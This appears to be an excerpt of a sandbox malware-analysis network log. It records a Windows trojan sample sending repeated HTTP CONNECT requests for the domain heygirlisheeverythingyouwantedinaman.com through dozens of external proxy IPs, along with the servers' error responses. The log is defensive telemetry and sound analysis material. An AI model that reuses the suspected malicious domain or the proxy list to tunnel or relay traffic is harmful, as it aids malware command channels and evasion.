                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.694952011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.695271015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1772192.168.2.855169162.159.242.62805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.640552044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.727549076 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1773192.168.2.854411193.30.13.189995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.664393902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.661324978 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1774192.168.2.855058171.244.10.204551455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.687467098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.695007086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.195508003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.991890907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1775192.168.2.85508913.232.245.132805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.702712059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.982780933 CET531INHTTP/1.1 405 Method Not Allowed
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Allow: POST,OPTIONS,HEAD,GET
                                                                                Content-Length: 331
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1776192.168.2.85511265.21.188.1880805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.703011036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.269684076 CET75INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:48 GMT
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1777192.168.2.85513937.221.197.165805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.703022003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.288602114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.898617983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.044466972 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.24.0
                                                                                Date: Fri, 23 Feb 2024 13:28:48 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1778192.168.2.855140162.144.36.208525175828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.718929052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.288660049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.898574114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.065834045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.288844109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.531151056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.694940090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:53.991626024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:02.491708994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1779192.168.2.855065115.187.50.9956785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.723155975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1780192.168.2.855194170.245.57.22880805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.723442078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1781192.168.2.855193103.152.112.167805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.726531029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.288602114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.757594109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.695100069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.585855007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.740737915 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.23.2
                                                                                Date: Fri, 23 Feb 2024 13:28:44 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1782192.168.2.85519251.255.20.138805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.740564108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.034019947 CET828INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:48 GMT
                                                                                Vary: Accept-Encoding
                                                                                Content-Length: 645
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2c 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 61 6e 64 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 61 6e 64 20 61 6e 79 74 68 69 6e 67 20 79 6f 75 20 6d 69 67 68 74 20 68 61 76 65 20 64 6f 6e 65 20 74 68 61 74 20 6d 61 79 20 68 61 76 65 0a 63 61 75 73 65 64 20 74 68 65 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, [no address given] and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.2.16 (Debian) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1783192.168.2.851015103.132.52.12280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.740566015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.854851961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.898199081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1784192.168.2.855094175.183.82.22181935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.754992962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1785192.168.2.855170212.31.100.13841535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.761791945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1786192.168.2.85420236.91.45.12516725828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.767065048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.166373014 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1787192.168.2.85509381.69.243.12610805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.770687103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1788192.168.2.8547525.44.42.82108085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.770771980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1789192.168.2.854923159.65.245.255805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.801054001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.882489920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.369277000 CET467INHTTP/1.1 403 Forbidden
                                                                                Date: Fri, 23 Feb 2024 13:28:45 GMT
                                                                                Server: Apache/2.4.18 (Ubuntu)
                                                                                Content-Length: 306
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1790192.168.2.855215104.16.106.154805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.827735901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.915554047 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1791192.168.2.855125175.183.82.22181975828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.837918997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1792192.168.2.855146106.105.218.244805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.852262974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1793192.168.2.85490072.37.217.341455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.868242979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1794192.168.2.85491420.219.118.36805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.872277021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.991653919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
